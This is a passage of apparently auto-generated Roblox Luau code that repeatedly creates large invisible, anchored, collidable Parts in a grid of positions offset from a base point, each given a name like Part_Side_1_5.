        _call714.Name = "Part_Side_0_22"
        _call714.Parent = workspace
        local _call721 = Instance.new("Part")
        _call721.Size = Vector3.new(2048, 1, 2048)
        _call721.Position = (_call51 + Vector3.new(- 0, 0, 45056))
        _call721.Anchored = true
        _call721.Transparency = 1
        _call721.CanCollide = true
        _call721.Name = "Part_LeftRight_0_22"
        _call721.Parent = workspace
        local _call728 = Instance.new("Part")
        _call728.Size = Vector3.new(2048, 1, 2048)
        _call728.Position = (_call51 + Vector3.new(- 0, 0, - 45056))
        _call728.Anchored = true
        _call728.Transparency = 1
        _call728.CanCollide = true
        _call728.Name = "Part_UpLeft_0_22"
        _call728.Parent = workspace
        local _call735 = Instance.new("Part")
        _call735.Size = Vector3.new(2048, 1, 2048)
        _call735.Position = (_call51 + Vector3.new(0, 0, - 45056))
        _call735.Anchored = true
        _call735.Transparency = 1
        _call735.CanCollide = true
        _call735.Name = "Part_UpRight_0_22"
        _call735.Parent = workspace
        local _call742 = Instance.new("Part")
        _call742.Size = Vector3.new(2048, 1, 2048)
        _call742.Position = (_call51 + Vector3.new(0, 0, 47104))
        _call742.Anchored = true
        _call742.Transparency = 1
        _call742.CanCollide = true
        _call742.Name = "Part_Side_0_23"
        _call742.Parent = workspace
        local _call749 = Instance.new("Part")
        _call749.Size = Vector3.new(2048, 1, 2048)
        _call749.Position = (_call51 + Vector3.new(- 0, 0, 47104))
        _call749.Anchored = true
        _call749.Transparency = 1
        _call749.CanCollide = true
        _call749.Name = "Part_LeftRight_0_23"
        _call749.Parent = workspace
        local _call756 = Instance.new("Part")
        _call756.Size = Vector3.new(2048, 1, 2048)
        _call756.Position = (_call51 + Vector3.new(- 0, 0, - 47104))
        _call756.Anchored = true
        _call756.Transparency = 1
        _call756.CanCollide = true
        _call756.Name = "Part_UpLeft_0_23"
        _call756.Parent = workspace
        local _call763 = Instance.new("Part")
        _call763.Size = Vector3.new(2048, 1, 2048)
        _call763.Position = (_call51 + Vector3.new(0, 0, - 47104))
        _call763.Anchored = true
        _call763.Transparency = 1
        _call763.CanCollide = true
        _call763.Name = "Part_UpRight_0_23"
        _call763.Parent = workspace
        local _call770 = Instance.new("Part")
        _call770.Size = Vector3.new(2048, 1, 2048)
        _call770.Position = (_call51 + Vector3.new(0, 0, 49152))
        _call770.Anchored = true
        _call770.Transparency = 1
        _call770.CanCollide = true
        _call770.Name = "Part_Side_0_24"
        _call770.Parent = workspace
        local _call777 = Instance.new("Part")
        _call777.Size = Vector3.new(2048, 1, 2048)
        _call777.Position = (_call51 + Vector3.new(- 0, 0, 49152))
        _call777.Anchored = true
        _call777.Transparency = 1
        _call777.CanCollide = true
        _call777.Name = "Part_LeftRight_0_24"
        _call777.Parent = workspace
        local _call784 = Instance.new("Part")
        _call784.Size = Vector3.new(2048, 1, 2048)
        _call784.Position = (_call51 + Vector3.new(- 0, 0, - 49152))
        _call784.Anchored = true
        _call784.Transparency = 1
        _call784.CanCollide = true
        _call784.Name = "Part_UpLeft_0_24"
        _call784.Parent = workspace
        local _call791 = Instance.new("Part")
        _call791.Size = Vector3.new(2048, 1, 2048)
        _call791.Position = (_call51 + Vector3.new(0, 0, - 49152))
        _call791.Anchored = true
        _call791.Transparency = 1
        _call791.CanCollide = true
        _call791.Name = "Part_UpRight_0_24"
        _call791.Parent = workspace
        local _call798 = Instance.new("Part")
        _call798.Size = Vector3.new(2048, 1, 2048)
        _call798.Position = (_call51 + Vector3.new(2048, 0, 0))
        _call798.Anchored = true
        _call798.Transparency = 1
        _call798.CanCollide = true
        _call798.Name = "Part_Side_1_0"
        _call798.Parent = workspace
        local _call805 = Instance.new("Part")
        _call805.Size = Vector3.new(2048, 1, 2048)
        _call805.Position = (_call51 + Vector3.new(- 2048, 0, 0))
        _call805.Anchored = true
        _call805.Transparency = 1
        _call805.CanCollide = true
        _call805.Name = "Part_LeftRight_1_0"
        _call805.Parent = workspace
        local _call812 = Instance.new("Part")
        _call812.Size = Vector3.new(2048, 1, 2048)
        _call812.Position = (_call51 + Vector3.new(- 2048, 0, - 0))
        _call812.Anchored = true
        _call812.Transparency = 1
        _call812.CanCollide = true
        _call812.Name = "Part_UpLeft_1_0"
        _call812.Parent = workspace
        local _call819 = Instance.new("Part")
        _call819.Size = Vector3.new(2048, 1, 2048)
        _call819.Position = (_call51 + Vector3.new(2048, 0, - 0))
        _call819.Anchored = true
        _call819.Transparency = 1
        _call819.CanCollide = true
        _call819.Name = "Part_UpRight_1_0"
        _call819.Parent = workspace
        local _call826 = Instance.new("Part")
        _call826.Size = Vector3.new(2048, 1, 2048)
        _call826.Position = (_call51 + Vector3.new(2048, 0, 2048))
        _call826.Anchored = true
        _call826.Transparency = 1
        _call826.CanCollide = true
        _call826.Name = "Part_Side_1_1"
        _call826.Parent = workspace
        local _call833 = Instance.new("Part")
        _call833.Size = Vector3.new(2048, 1, 2048)
        _call833.Position = (_call51 + Vector3.new(- 2048, 0, 2048))
        _call833.Anchored = true
        _call833.Transparency = 1
        _call833.CanCollide = true
        _call833.Name = "Part_LeftRight_1_1"
        _call833.Parent = workspace
        local _call840 = Instance.new("Part")
        _call840.Size = Vector3.new(2048, 1, 2048)
        _call840.Position = (_call51 + Vector3.new(- 2048, 0, - 2048))
        _call840.Anchored = true
        _call840.Transparency = 1
        _call840.CanCollide = true
        _call840.Name = "Part_UpLeft_1_1"
        _call840.Parent = workspace
        local _call847 = Instance.new("Part")
        _call847.Size = Vector3.new(2048, 1, 2048)
        _call847.Position = (_call51 + Vector3.new(2048, 0, - 2048))
        _call847.Anchored = true
        _call847.Transparency = 1
        _call847.CanCollide = true
        _call847.Name = "Part_UpRight_1_1"
        _call847.Parent = workspace
        local _call854 = Instance.new("Part")
        _call854.Size = Vector3.new(2048, 1, 2048)
        _call854.Position = (_call51 + Vector3.new(2048, 0, 4096))
        _call854.Anchored = true
        _call854.Transparency = 1
        _call854.CanCollide = true
        _call854.Name = "Part_Side_1_2"
        _call854.Parent = workspace
        local _call861 = Instance.new("Part")
        _call861.Size = Vector3.new(2048, 1, 2048)
        _call861.Position = (_call51 + Vector3.new(- 2048, 0, 4096))
        _call861.Anchored = true
        _call861.Transparency = 1
        _call861.CanCollide = true
        _call861.Name = "Part_LeftRight_1_2"
        _call861.Parent = workspace
        local _call868 = Instance.new("Part")
        _call868.Size = Vector3.new(2048, 1, 2048)
        _call868.Position = (_call51 + Vector3.new(- 2048, 0, - 4096))
        _call868.Anchored = true
        _call868.Transparency = 1
        _call868.CanCollide = true
        _call868.Name = "Part_UpLeft_1_2"
        _call868.Parent = workspace
        local _call875 = Instance.new("Part")
        _call875.Size = Vector3.new(2048, 1, 2048)
        _call875.Position = (_call51 + Vector3.new(2048, 0, - 4096))
        _call875.Anchored = true
        _call875.Transparency = 1
        _call875.CanCollide = true
        _call875.Name = "Part_UpRight_1_2"
        _call875.Parent = workspace
        local _call882 = Instance.new("Part")
        _call882.Size = Vector3.new(2048, 1, 2048)
        _call882.Position = (_call51 + Vector3.new(2048, 0, 6144))
        _call882.Anchored = true
        _call882.Transparency = 1
        _call882.CanCollide = true
        _call882.Name = "Part_Side_1_3"
        _call882.Parent = workspace
        local _call889 = Instance.new("Part")
        _call889.Size = Vector3.new(2048, 1, 2048)
        _call889.Position = (_call51 + Vector3.new(- 2048, 0, 6144))
        _call889.Anchored = true
        _call889.Transparency = 1
        _call889.CanCollide = true
        _call889.Name = "Part_LeftRight_1_3"
        _call889.Parent = workspace
        local _call896 = Instance.new("Part")
        _call896.Size = Vector3.new(2048, 1, 2048)
        _call896.Position = (_call51 + Vector3.new(- 2048, 0, - 6144))
        _call896.Anchored = true
        _call896.Transparency = 1
        _call896.CanCollide = true
        _call896.Name = "Part_UpLeft_1_3"
        _call896.Parent = workspace
        local _call903 = Instance.new("Part")
        _call903.Size = Vector3.new(2048, 1, 2048)
        _call903.Position = (_call51 + Vector3.new(2048, 0, - 6144))
        _call903.Anchored = true
        _call903.Transparency = 1
        _call903.CanCollide = true
        _call903.Name = "Part_UpRight_1_3"
        _call903.Parent = workspace
        local _call910 = Instance.new("Part")
        _call910.Size = Vector3.new(2048, 1, 2048)
        _call910.Position = (_call51 + Vector3.new(2048, 0, 8192))
        _call910.Anchored = true
        _call910.Transparency = 1
        _call910.CanCollide = true
        _call910.Name = "Part_Side_1_4"
        _call910.Parent = workspace
        local _call917 = Instance.new("Part")
        _call917.Size = Vector3.new(2048, 1, 2048)
        _call917.Position = (_call51 + Vector3.new(- 2048, 0, 8192))
        _call917.Anchored = true
        _call917.Transparency = 1
        _call917.CanCollide = true
        _call917.Name = "Part_LeftRight_1_4"
        _call917.Parent = workspace
        local _call924 = Instance.new("Part")
        _call924.Size = Vector3.new(2048, 1, 2048)
        _call924.Position = (_call51 + Vector3.new(- 2048, 0, - 8192))
        _call924.Anchored = true
        _call924.Transparency = 1
        _call924.CanCollide = true
        _call924.Name = "Part_UpLeft_1_4"
        _call924.Parent = workspace
        local _call931 = Instance.new("Part")
        _call931.Size = Vector3.new(2048, 1, 2048)
        _call931.Position = (_call51 + Vector3.new(2048, 0, - 8192))
        _call931.Anchored = true
        _call931.Transparency = 1
        _call931.CanCollide = true
        _call931.Name = "Part_UpRight_1_4"
        _call931.Parent = workspace
        local _call938 = Instance.new("Part")
        _call938.Size = Vector3.new(2048, 1, 2048)
        _call938.Position = (_call51 + Vector3.new(2048, 0, 10240))
        _call938.Anchored = true
        _call938.Transparency = 1
        _call938.CanCollide = true
        _call938.Name = "Part_Side_1_5"
        _call938.Parent = workspace
        local _call945 = Instance.new("Part")
        _call945.Size = Vector3.new(2048, 1, 2048)
        _call945.Position = (_call51 + Vector3.new(- 2048, 0, 10240))
        _call945.Anchored = true
        _call945.Transparency = 1
        _call945.CanCollide = true
        _call945.Name = "Part_LeftRight_1_5"
        _call945.Parent = workspace
        local _call952 = Instance.new("Part")
        _call952.Size = Vector3.new(2048, 1, 2048)
        _call952.Position = (_call51 + Vector3.new(- 2048, 0, - 10240))
        _call952.Anchored = true
        _call952.Transparency = 1
        _call952.CanCollide = true
        _call952.Name = "Part_UpLeft_1_5"
        _call952.Parent = workspace
        local _call959 = Instance.new("Part")
        _call959.Size = Vector3.new(2048, 1, 2048)
        _call959.Position = (_call51 + Vector3.new(2048, 0, - 10240))
        _call959.Anchored = true
        _call959.Transparency = 1
        _call959.CanCollide = true
        _call959.Name = "Part_UpRight_1_5"
        _call959.Parent = workspace
        local _call966 = Instance.new("Part")
        _call966.Size = Vector3.new(2048, 1, 2048)
        _call966.Position = (_call51 + Vector3.new(2048, 0, 12288))
        _call966.Anchored = true
        _call966.Transparency = 1
        _call966.CanCollide = true
        _call966.Name = "Part_Side_1_6"
        _call966.Parent = workspace
        local _call973 = Instance.new("Part")
        _call973.Size = Vector3.new(2048, 1, 2048)
        _call973.Position = (_call51 + Vector3.new(- 2048, 0, 12288))
        _call973.Anchored = true
        _call973.Transparency = 1
        _call973.CanCollide = true
        _call973.Name = "Part_LeftRight_1_6"
        _call973.Parent = workspace
        local _call980 = Instance.new("Part")
        _call980.Size = Vector3.new(2048, 1, 2048)
        _call980.Position = (_call51 + Vector3.new(- 2048, 0, - 12288))
        _call980.Anchored = true
        _call980.Transparency = 1
        _call980.CanCollide = true
        _call980.Name = "Part_UpLeft_1_6"
        _call980.Parent = workspace
        local _call987 = Instance.new("Part")
        _call987.Size = Vector3.new(2048, 1, 2048)
        _call987.Position = (_call51 + Vector3.new(2048, 0, - 12288))
        _call987.Anchored = true
        _call987.Transparency = 1
        _call987.CanCollide = true
        _call987.Name = "Part_UpRight_1_6"
        _call987.Parent = workspace
        local _call994 = Instance.new("Part")
        _call994.Size = Vector3.new(2048, 1, 2048)
        _call994.Position = (_call51 + Vector3.new(2048, 0, 14336))
        _call994.Anchored = true
        _call994.Transparency = 1
        _call994.CanCollide = true
        _call994.Name = "Part_Side_1_7"
        _call994.Parent = workspace
        local _call1001 = Instance.new("Part")
        _call1001.Size = Vector3.new(2048, 1, 2048)
        _call1001.Position = (_call51 + Vector3.new(- 2048, 0, 14336))
        _call1001.Anchored = true
        _call1001.Transparency = 1
        _call1001.CanCollide = true
        _call1001.Name = "Part_LeftRight_1_7"
        _call1001.Parent = workspace
        local _call1008 = Instance.new("Part")
        _call1008.Size = Vector3.new(2048, 1, 2048)
        _call1008.Position = (_call51 + Vector3.new(- 2048, 0, - 14336))
        _call1008.Anchored = true
        _call1008.Transparency = 1
        _call1008.CanCollide = true
        _call1008.Name = "Part_UpLeft_1_7"
        _call1008.Parent = workspace
        local _call1015 = Instance.new("Part")
        _call1015.Size = Vector3.new(2048, 1, 2048)
        _call1015.Position = (_call51 + Vector3.new(2048, 0, - 14336))
        _call1015.Anchored = true
        _call1015.Transparency = 1
        _call1015.CanCollide = true
        _call1015.Name = "Part_UpRight_1_7"
        _call1015.Parent = workspace
        local _call1022 = Instance.new("Part")
        _call1022.Size = Vector3.new(2048, 1, 2048)
        _call1022.Position = (_call51 + Vector3.new(2048, 0, 16384))
        _call1022.Anchored = true
        _call1022.Transparency = 1
        _call1022.CanCollide = true
        _call1022.Name = "Part_Side_1_8"
        _call1022.Parent = workspace
        local _call1029 = Instance.new("Part")
        _call1029.Size = Vector3.new(2048, 1, 2048)
        _call1029.Position = (_call51 + Vector3.new(- 2048, 0, 16384))
        _call1029.Anchored = true
        _call1029.Transparency = 1
        _call1029.CanCollide = true
        _call1029.Name = "Part_LeftRight_1_8"
        _call1029.Parent = workspace
        local _call1036 = Instance.new("Part")
        _call1036.Size = Vector3.new(2048, 1, 2048)
        _call1036.Position = (_call51 + Vector3.new(- 2048, 0, - 16384))
        _call1036.Anchored = true
        _call1036.Transparency = 1
        _call1036.CanCollide = true
        _call1036.Name = "Part_UpLeft_1_8"
        _call1036.Parent = workspace
        local _call1043 = Instance.new("Part")
        _call1043.Size = Vector3.new(2048, 1, 2048)
        _call1043.Position = (_call51 + Vector3.new(2048, 0, - 16384))
        _call1043.Anchored = true
        _call1043.Transparency = 1
        _call1043.CanCollide = true
        _call1043.Name = "Part_UpRight_1_8"
        _call1043.Parent = workspace
        local _call1050 = Instance.new("Part")
        _call1050.Size = Vector3.new(2048, 1, 2048)
        _call1050.Position = (_call51 + Vector3.new(2048, 0, 18432))
        _call1050.Anchored = true
        _call1050.Transparency = 1
        _call1050.CanCollide = true
        _call1050.Name = "Part_Side_1_9"
        _call1050.Parent = workspace
        local _call1057 = Instance.new("Part")
        _call1057.Size = Vector3.new(2048, 1, 2048)
        _call1057.Position = (_call51 + Vector3.new(- 2048, 0, 18432))
        _call1057.Anchored = true
        _call1057.Transparency = 1
        _call1057.CanCollide = true
        _call1057.Name = "Part_LeftRight_1_9"
        _call1057.Parent = workspace
        local _call1064 = Instance.new("Part")
        _call1064.Size = Vector3.new(2048, 1, 2048)
        _call1064.Position = (_call51 + Vector3.new(- 2048, 0, - 18432))
        _call1064.Anchored = true
        _call1064.Transparency = 1
        _call1064.CanCollide = true
        _call1064.Name = "Part_UpLeft_1_9"
        _call1064.Parent = workspace
        local _call1071 = Instance.new("Part")
        _call1071.Size = Vector3.new(2048, 1, 2048)
        _call1071.Position = (_call51 + Vector3.new(2048, 0, - 18432))
        _call1071.Anchored = true
        _call1071.Transparency = 1
        _call1071.CanCollide = true
        _call1071.Name = "Part_UpRight_1_9"
        _call1071.Parent = workspace
        local _call1078 = Instance.new("Part")
        _call1078.Size = Vector3.new(2048, 1, 2048)
        _call1078.Position = (_call51 + Vector3.new(2048, 0, 20480))
        _call1078.Anchored = true
        _call1078.Transparency = 1
        _call1078.CanCollide = true
        _call1078.Name = "Part_Side_1_10"
        _call1078.Parent = workspace
        local _call1085 = Instance.new("Part")
        _call1085.Size = Vector3.new(2048, 1, 2048)
        _call1085.Position = (_call51 + Vector3.new(- 2048, 0, 20480))
        _call1085.Anchored = true
        _call1085.Transparency = 1
        _call1085.CanCollide = true
        _call1085.Name = "Part_LeftRight_1_10"
        _call1085.Parent = workspace
        local _call1092 = Instance.new("Part")
        _call1092.Size = Vector3.new(2048, 1, 2048)
        _call1092.Position = (_call51 + Vector3.new(- 2048, 0, - 20480))
        _call1092.Anchored = true
        _call1092.Transparency = 1
        _call1092.CanCollide = true
        _call1092.Name = "Part_UpLeft_1_10"
        _call1092.Parent = workspace
        local _call1099 = Instance.new("Part")
        _call1099.Size = Vector3.new(2048, 1, 2048)
        _call1099.Position = (_call51 + Vector3.new(2048, 0, - 20480))
        _call1099.Anchored = true
        _call1099.Transparency = 1
        _call1099.CanCollide = true
        _call1099.Name = "Part_UpRight_1_10"
        _call1099.Parent = workspace
        local _call1106 = Instance.new("Part")
        _call1106.Size = Vector3.new(2048, 1, 2048)
        _call1106.Position = (_call51 + Vector3.new(2048, 0, 22528))
        _call1106.Anchored = true
        _call1106.Transparency = 1
        _call1106.CanCollide = true
        _call1106.Name = "Part_Side_1_11"
        _call1106.Parent = workspace
        local _call1113 = Instance.new("Part")
        _call1113.Size = Vector3.new(2048, 1, 2048)
        _call1113.Position = (_call51 + Vector3.new(- 2048, 0, 22528))
        _call1113.Anchored = true
        _call1113.Transparency = 1
        _call1113.CanCollide = true
        _call1113.Name = "Part_LeftRight_1_11"
        _call1113.Parent = workspace
        local _call1120 = Instance.new("Part")
        _call1120.Size = Vector3.new(2048, 1, 2048)
        _call1120.Position = (_call51 + Vector3.new(- 2048, 0, - 22528))
        _call1120.Anchored = true
        _call1120.Transparency = 1
        _call1120.CanCollide = true
        _call1120.Name = "Part_UpLeft_1_11"
        _call1120.Parent = workspace
        local _call1127 = Instance.new("Part")
        _call1127.Size = Vector3.new(2048, 1, 2048)
        _call1127.Position = (_call51 + Vector3.new(2048, 0, - 22528))
        _call1127.Anchored = true
        _call1127.Transparency = 1
        _call1127.CanCollide = true
        _call1127.Name = "Part_UpRight_1_11"
        _call1127.Parent = workspace
        local _call1134 = Instance.new("Part")
        _call1134.Size = Vector3.new(2048, 1, 2048)
        _call1134.Position = (_call51 + Vector3.new(2048, 0, 24576))
        _call1134.Anchored = true
        _call1134.Transparency = 1
        _call1134.CanCollide = true
        _call1134.Name = "Part_Side_1_12"
        _call1134.Parent = workspace
        local _call1141 = Instance.new("Part")
        _call1141.Size = Vector3.new(2048, 1, 2048)
        _call1141.Position = (_call51 + Vector3.new(- 2048, 0, 24576))
        _call1141.Anchored = true
        _call1141.Transparency = 1
        _call1141.CanCollide = true
        _call1141.Name = "Part_LeftRight_1_12"
        _call1141.Parent = workspace
        local _call1148 = Instance.new("Part")
        _call1148.Size = Vector3.new(2048, 1, 2048)
        _call1148.Position = (_call51 + Vector3.new(- 2048, 0, - 24576))
        _call1148.Anchored = true
        _call1148.Transparency = 1
        _call1148.CanCollide = true
        _call1148.Name = "Part_UpLeft_1_12"
        _call1148.Parent = workspace
        local _call1155 = Instance.new("Part")
        _call1155.Size = Vector3.new(2048, 1, 2048)
        _call1155.Position = (_call51 + Vector3.new(2048, 0, - 24576))
        _call1155.Anchored = true
        _call1155.Transparency = 1
        _call1155.CanCollide = true
        _call1155.Name = "Part_UpRight_1_12"
        _call1155.Parent = workspace
        local _call1162 = Instance.new("Part")
        _call1162.Size = Vector3.new(2048, 1, 2048)
        _call1162.Position = (_call51 + Vector3.new(2048, 0, 26624))
        _call1162.Anchored = true
        _call1162.Transparency = 1
        _call1162.CanCollide = true
        _call1162.Name = "Part_Side_1_13"
        _call1162.Parent = workspace
        local _call1169 = Instance.new("Part")
        _call1169.Size = Vector3.new(2048, 1, 2048)
        _call1169.Position = (_call51 + Vector3.new(- 2048, 0, 26624))
        _call1169.Anchored = true
        _call1169.Transparency = 1
        _call1169.CanCollide = true
        _call1169.Name = "Part_LeftRight_1_13"
        _call1169.Parent = workspace
        local _call1176 = Instance.new("Part")
        _call1176.Size = Vector3.new(2048, 1, 2048)
        _call1176.Position = (_call51 + Vector3.new(- 2048, 0, - 26624))
        _call1176.Anchored = true
        _call1176.Transparency = 1
        _call1176.CanCollide = true
        _call1176.Name = "Part_UpLeft_1_13"
        _call1176.Parent = workspace
        local _call1183 = Instance.new("Part")
        _call1183.Size = Vector3.new(2048, 1, 2048)
        _call1183.Position = (_call51 + Vector3.new(2048, 0, - 26624))
        _call1183.Anchored = true
        _call1183.Transparency = 1
        _call1183.CanCollide = true
        _call1183.Name = "Part_UpRight_1_13"
        _call1183.Parent = workspace
        local _call1190 = Instance.new("Part")
        _call1190.Size = Vector3.new(2048, 1, 2048)
        _call1190.Position = (_call51 + Vector3.new(2048, 0, 28672))
        _call1190.Anchored = true
        _call1190.Transparency = 1
        _call1190.CanCollide = true
        _call1190.Name = "Part_Side_1_14"
        _call1190.Parent = workspace
        local _call1197 = Instance.new("Part")
        _call1197.Size = Vector3.new(2048, 1, 2048)
        _call1197.Position = (_call51 + Vector3.new(- 2048, 0, 28672))
        _call1197.Anchored = true
        _call1197.Transparency = 1
        _call1197.CanCollide = true
        _call1197.Name = "Part_LeftRight_1_14"
        _call1197.Parent = workspace
        local _call1204 = Instance.new("Part")
        _call1204.Size = Vector3.new(2048, 1, 2048)
        _call1204.Position = (_call51 + Vector3.new(- 2048, 0, - 28672))
        _call1204.Anchored = true
        _call1204.Transparency = 1
        _call1204.CanCollide = true
        _call1204.Name = "Part_UpLeft_1_14"
        _call1204.Parent = workspace
        local _call1211 = Instance.new("Part")
        _call1211.Size = Vector3.new(2048, 1, 2048)
        _call1211.Position = (_call51 + Vector3.new(2048, 0, - 28672))
        _call1211.Anchored = true
        _call1211.Transparency = 1
        _call1211.CanCollide = true
        _call1211.Name = "Part_UpRight_1_14"
        _call1211.Parent = workspace
        local _call1218 = Instance.new("Part")
        _call1218.Size = Vector3.new(2048, 1, 2048)
        _call1218.Position = (_call51 + Vector3.new(2048, 0, 30720))
        _call1218.Anchored = true
        _call1218.Transparency = 1
        _call1218.CanCollide = true
        _call1218.Name = "Part_Side_1_15"
        _call1218.Parent = workspace
        local _call1225 = Instance.new("Part")
        _call1225.Size = Vector3.new(2048, 1, 2048)
        _call1225.Position = (_call51 + Vector3.new(- 2048, 0, 30720))
        _call1225.Anchored = true
        _call1225.Transparency = 1
        _call1225.CanCollide = true
        _call1225.Name = "Part_LeftRight_1_15"
        _call1225.Parent = workspace
        local _call1232 = Instance.new("Part")
        _call1232.Size = Vector3.new(2048, 1, 2048)
        _call1232.Position = (_call51 + Vector3.new(- 2048, 0, - 30720))
        _call1232.Anchored = true
        _call1232.Transparency = 1
        _call1232.CanCollide = true
        _call1232.Name = "Part_UpLeft_1_15"
        _call1232.Parent = workspace
        local _call1239 = Instance.new("Part")
        _call1239.Size = Vector3.new(2048, 1, 2048)
        _call1239.Position = (_call51 + Vector3.new(2048, 0, - 30720))
        _call1239.Anchored = true
        _call1239.Transparency = 1
        _call1239.CanCollide = true
        _call1239.Name = "Part_UpRight_1_15"
        _call1239.Parent = workspace
        local _call1246 = Instance.new("Part")
        _call1246.Size = Vector3.new(2048, 1, 2048)
        _call1246.Position = (_call51 + Vector3.new(2048, 0, 32768))
        _call1246.Anchored = true
        _call1246.Transparency = 1
        _call1246.CanCollide = true
        _call1246.Name = "Part_Side_1_16"
        _call1246.Parent = workspace
        local _call1253 = Instance.new("Part")
        _call1253.Size = Vector3.new(2048, 1, 2048)
        _call1253.Position = (_call51 + Vector3.new(- 2048, 0, 32768))
        _call1253.Anchored = true
        _call1253.Transparency = 1
        _call1253.CanCollide = true
        _call1253.Name = "Part_LeftRight_1_16"
        _call1253.Parent = workspace
        local _call1260 = Instance.new("Part")
        _call1260.Size = Vector3.new(2048, 1, 2048)
        _call1260.Position = (_call51 + Vector3.new(- 2048, 0, - 32768))
        _call1260.Anchored = true
        _call1260.Transparency = 1
        _call1260.CanCollide = true
        _call1260.Name = "Part_UpLeft_1_16"
        _call1260.Parent = workspace
        local _call1267 = Instance.new("Part")
        _call1267.Size = Vector3.new(2048, 1, 2048)
        _call1267.Position = (_call51 + Vector3.new(2048, 0, - 32768))
        _call1267.Anchored = true
        _call1267.Transparency = 1
        _call1267.CanCollide = true
        _call1267.Name = "Part_UpRight_1_16"
        _call1267.Parent = workspace
        local _call1274 = Instance.new("Part")
        _call1274.Size = Vector3.new(2048, 1, 2048)
        _call1274.Position = (_call51 + Vector3.new(2048, 0, 34816))
        _call1274.Anchored = true
        _call1274.Transparency = 1
        _call1274.CanCollide = true
        _call1274.Name = "Part_Side_1_17"
        _call1274.Parent = workspace
        local _call1281 = Instance.new("Part")
        _call1281.Size = Vector3.new(2048, 1, 2048)
        _call1281.Position = (_call51 + Vector3.new(- 2048, 0, 34816))
        _call1281.Anchored = true
        _call1281.Transparency = 1
        _call1281.CanCollide = true
        _call1281.Name = "Part_LeftRight_1_17"
        _call1281.Parent = workspace
        local _call1288 = Instance.new("Part")
        _call1288.Size = Vector3.new(2048, 1, 2048)
        _call1288.Position = (_call51 + Vector3.new(- 2048, 0, - 34816))
        _call1288.Anchored = true
        _call1288.Transparency = 1
        _call1288.CanCollide = true
        _call1288.Name = "Part_UpLeft_1_17"
        _call1288.Parent = workspace
        local _call1295 = Instance.new("Part")
        _call1295.Size = Vector3.new(2048, 1, 2048)
        _call1295.Position = (_call51 + Vector3.new(2048, 0, - 34816))
        _call1295.Anchored = true
        _call1295.Transparency = 1
        _call1295.CanCollide = true
        _call1295.Name = "Part_UpRight_1_17"
        _call1295.Parent = workspace
        local _call1302 = Instance.new("Part")
        _call1302.Size = Vector3.new(2048, 1, 2048)
        _call1302.Position = (_call51 + Vector3.new(2048, 0, 36864))
        _call1302.Anchored = true
        _call1302.Transparency = 1
        _call1302.CanCollide = true
        _call1302.Name = "Part_Side_1_18"
        _call1302.Parent = workspace
        local _call1309 = Instance.new("Part")
        _call1309.Size = Vector3.new(2048, 1, 2048)
        _call1309.Position = (_call51 + Vector3.new(- 2048, 0, 36864))
        _call1309.Anchored = true
        _call1309.Transparency = 1
        _call1309.CanCollide = true
        _call1309.Name = "Part_LeftRight_1_18"
        _call1309.Parent = workspace
        local _call1316 = Instance.new("Part")
        _call1316.Size = Vector3.new(2048, 1, 2048)
        _call1316.Position = (_call51 + Vector3.new(- 2048, 0, - 36864))
        _call1316.Anchored = true
        _call1316.Transparency = 1
        _call1316.CanCollide = true
        _call1316.Name = "Part_UpLeft_1_18"
        _call1316.Parent = workspace
        local _call1323 = Instance.new("Part")
        _call1323.Size = Vector3.new(2048, 1, 2048)
        _call1323.Position = (_call51 + Vector3.new(2048, 0, - 36864))
        _call1323.Anchored = true
        _call1323.Transparency = 1
        _call1323.CanCollide = true
        _call1323.Name = "Part_UpRight_1_18"
        _call1323.Parent = workspace
        local _call1330 = Instance.new("Part")
        _call1330.Size = Vector3.new(2048, 1, 2048)
        _call1330.Position = (_call51 + Vector3.new(2048, 0, 38912))
        _call1330.Anchored = true
        _call1330.Transparency = 1
        _call1330.CanCollide = true
        _call1330.Name = "Part_Side_1_19"
        _call1330.Parent = workspace
        local _call1337 = Instance.new("Part")
        _call1337.Size = Vector3.new(2048, 1, 2048)
        _call1337.Position = (_call51 + Vector3.new(- 2048, 0, 38912))
        _call1337.Anchored = true
        _call1337.Transparency = 1
        _call1337.CanCollide = true
        _call1337.Name = "Part_LeftRight_1_19"
        _call1337.Parent = workspace
        local _call1344 = Instance.new("Part")
        _call1344.Size = Vector3.new(2048, 1, 2048)
        _call1344.Position = (_call51 + Vector3.new(- 2048, 0, - 38912))
        _call1344.Anchored = true
        _call1344.Transparency = 1
        _call1344.CanCollide = true
        _call1344.Name = "Part_UpLeft_1_19"
        _call1344.Parent = workspace
        local _call1351 = Instance.new("Part")
        _call1351.Size = Vector3.new(2048, 1, 2048)
        _call1351.Position = (_call51 + Vector3.new(2048, 0, - 38912))
        _call1351.Anchored = true
        _call1351.Transparency = 1
        _call1351.CanCollide = true
        _call1351.Name = "Part_UpRight_1_19"
        _call1351.Parent = workspace
        local _call1358 = Instance.new("Part")
        _call1358.Size = Vector3.new(2048, 1, 2048)
        _call1358.Position = (_call51 + Vector3.new(2048, 0, 40960))
        _call1358.Anchored = true
        _call1358.Transparency = 1
        _call1358.CanCollide = true
        _call1358.Name = "Part_Side_1_20"
        _call1358.Parent = workspace
        local _call1365 = Instance.new("Part")
        _call1365.Size = Vector3.new(2048, 1, 2048)
        _call1365.Position = (_call51 + Vector3.new(- 2048, 0, 40960))
        _call1365.Anchored = true
        _call1365.Transparency = 1
        _call1365.CanCollide = true
        _call1365.Name = "Part_LeftRight_1_20"
        _call1365.Parent = workspace
        local _call1372 = Instance.new("Part")
        _call1372.Size = Vector3.new(2048, 1, 2048)
        _call1372.Position = (_call51 + Vector3.new(- 2048, 0, - 40960))
        _call1372.Anchored = true
        _call1372.Transparency = 1
        _call1372.CanCollide = true
        _call1372.Name = "Part_UpLeft_1_20"
        _call1372.Parent = workspace
        local _call1379 = Instance.new("Part")
        _call1379.Size = Vector3.new(2048, 1, 2048)
        _call1379.Position = (_call51 + Vector3.new(2048, 0, - 40960))
        _call1379.Anchored = true
        _call1379.Transparency = 1
        _call1379.CanCollide = true
        _call1379.Name = "Part_UpRight_1_20"
        _call1379.Parent = workspace
        local _call1386 = Instance.new("Part")
        _call1386.Size = Vector3.new(2048, 1, 2048)
        _call1386.Position = (_call51 + Vector3.new(2048, 0, 43008))
        _call1386.Anchored = true
        _call1386.Transparency = 1
        _call1386.CanCollide = true
        _call1386.Name = "Part_Side_1_21"
        _call1386.Parent = workspace
        local _call1393 = Instance.new("Part")
        _call1393.Size = Vector3.new(2048, 1, 2048)
        _call1393.Position = (_call51 + Vector3.new(- 2048, 0, 43008))
        _call1393.Anchored = true
        _call1393.Transparency = 1
        _call1393.CanCollide = true
        _call1393.Name = "Part_LeftRight_1_21"
        _call1393.Parent = workspace
        local _call1400 = Instance.new("Part")
